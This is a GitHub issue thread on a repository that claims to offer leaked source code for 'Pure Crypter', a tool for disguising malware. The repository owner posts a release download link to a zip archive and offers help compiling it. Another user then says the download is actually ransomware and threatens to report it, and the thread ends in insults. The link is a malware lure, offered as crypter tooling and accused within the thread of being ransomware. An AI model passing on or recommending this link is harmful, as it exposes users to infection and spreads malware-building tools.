### ISSUE TITLE
leakage??  What about the source code??

### ISSUE THREAD

**Issue by kk159963** [SoftawreLeaker/PURE-CRYPTER-SOURCE-CODE-LEAKED-#1]

**Comment by SoftawreLeaker** [comment]
source is leaked

**Comment by kk159963** [comment]
Why? ??

Source code leaked? ? Where is the source code? ?

Didn't see your post...ZIP? ? ? rar??

**Comment by SoftawreLeaker** [comment]
yes, its in .zip archive
you must compile it by you own (there is solution file)
If somethink is unclear, i will help :)

**Comment by kk159963** [comment]
Are you kidding bro?

you only give an introduction

No source code and files are released at all.

I have absolutely no idea what you're talking about
hahahahhaa LOl

**Comment by SoftawreLeaker** [comment]
Check fucking attatchment in .zip
there is .sln file, to compile
open your eyes
https://github.com/SoftawreLeaker/PURE-CRYPTER-SOURCE-CODE-LEAKED-/releases/download/Pure_Crypter/Pure-Crypter-ADVANCED.CRYPTER.zip

**Comment by kk159963** [comment]
sorry... my eyes are shit...

**Comment by kk159963** [comment]
Hahaha do you think using ransomware will work for me? ? ?LOl hahaha I will submit samples

**Comment by kk159963** [comment]
stupid i have your account and sample dialogue

Submit to local cybercrime center
Hahaha
and will upload investigation materials related to criminal matters

You are so stupid hahahaha

**Comment by SoftawreLeaker** [comment]
Hahaah do it, kid :D
Do it, and go to beg for money from your parents, to another fortinite skin :D

**Comment by kk159963** [comment]
Laugh at me, fool, this ransomware is shit

You'd better go back to study, kid
